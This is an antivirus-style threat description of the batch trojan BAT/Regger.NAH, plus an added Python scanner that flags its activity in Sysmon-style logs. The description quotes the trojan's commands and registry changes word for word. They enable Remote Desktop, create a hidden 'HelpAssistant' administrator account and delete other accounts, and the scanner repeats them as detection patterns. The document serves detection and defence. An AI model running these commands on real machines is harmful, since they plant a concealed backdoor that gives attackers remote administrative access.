BAT/Regger [Threat Name]

BAT/Regger.NAH [Threat Variant Name]

Category trojan
Detection created Jul 19, 2013
Detection database version 8585
Short description

The trojan has a simple payload.

Installation

The trojan does not create any copies of itself.


The trojan is probably a part of other malware.

Other information

The trojan executes the following commands:

  • netsh firewall set service type=remotedesktop mode=enable scope=all > nul
  • net user timalin /delete > nul
  • net user NTUSER /delete > nul
  • net user /add HelpAssistant jevoussalue > nul
  • net localgroup Administrators /add NTUSER > nul
  • net localgroup Administrateurs /add NTUSER > nul

The following Registry entries are created:

  • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    • "fDenyTSConnections" = 0
  • [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist]
    • "HelpAssistant" = 0

The trojan then removes itself from the computer.
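Added detection example (not part of the original threat description): a Python scanner that flags the commands and registry changes listed above when they appear in Sysmon-style process-creation (event 1) and registry value-set (event 13) records. The pipe-separated log format and the sample lines are constructed for this example.

```python
import re

# Constructed sample log, Sysmon-style "EventID|Image or TargetObject|CommandLine or Details".
# Lines 1-4 mirror the commands listed above, 6-7 the registry values; lines 5 and 8 are benign.
SAMPLE_EVENTS = [
    "1|C:\\Windows\\System32\\netsh.exe|netsh firewall set service type=remotedesktop mode=enable scope=all",
    "1|C:\\Windows\\System32\\net.exe|net user NTUSER /delete",
    "1|C:\\Windows\\System32\\net.exe|net user /add HelpAssistant jevoussalue",
    "1|C:\\Windows\\System32\\net.exe|net localgroup Administrateurs /add NTUSER",
    "1|C:\\Windows\\System32\\net.exe|net user alice /add",
    "13|HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections|DWORD (0x00000000)",
    "13|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\\HelpAssistant|DWORD (0x00000000)",
    "13|HKLM\\SOFTWARE\\Example\\Setting|DWORD (0x00000001)",
]

# Process-creation rules (event 1), matched against the command line.
COMMAND_RULES = [
    ("rdp_opened_in_firewall",
     re.compile(r"netsh\s+firewall\s+set\s+service\s+type=remotedesktop\s+mode=enable", re.I)),
    ("local_account_deleted",
     re.compile(r"net\s+user\s+\S+\s+/delete\b", re.I)),
    ("helpassistant_account_created",
     re.compile(r"net\s+user\s+(/add\s+HelpAssistant\b|HelpAssistant\s+\S+\s+/add\b)", re.I)),
    ("admin_group_member_added",  # English and French group names, as in the listed commands
     re.compile(r"net\s+localgroup\s+(Administrators|Administrateurs)\s+(/add\s+\S+|\S+\s+/add)\b", re.I)),
]

# Registry value-set rules (event 13): (name, key regex, value that indicates the tampered state).
# fDenyTSConnections = 0 allows RDP; a Userlist value of 0 hides that account from the logon screen.
REGISTRY_RULES = [
    ("rdp_connections_allowed",
     re.compile(r"\\Terminal Server\\fDenyTSConnections$", re.I), "0x00000000"),
    ("account_hidden_from_logon_screen",
     re.compile(r"\\Winlogon\\SpecialAccounts\\Userlist\\[^\\]+$", re.I), "0x00000000"),
]


def scan_events(lines):
    """Return a list of (line_number, rule_name) for every event that matches a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        event_id, target, detail = line.split("|", 2)
        if event_id == "1":
            hits.extend((n, name) for name, pat in COMMAND_RULES if pat.search(detail))
        elif event_id == "13":
            hits.extend((n, name) for name, pat, value in REGISTRY_RULES
                        if pat.search(target) and value in detail)
    return hits


if __name__ == "__main__":
    for n, name in scan_events(SAMPLE_EVENTS):
        print(f"line {n}: {name}")
```

Any single hit deserves a look, but the combination of all four command rules on one host within seconds is the sequence this variant produces.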
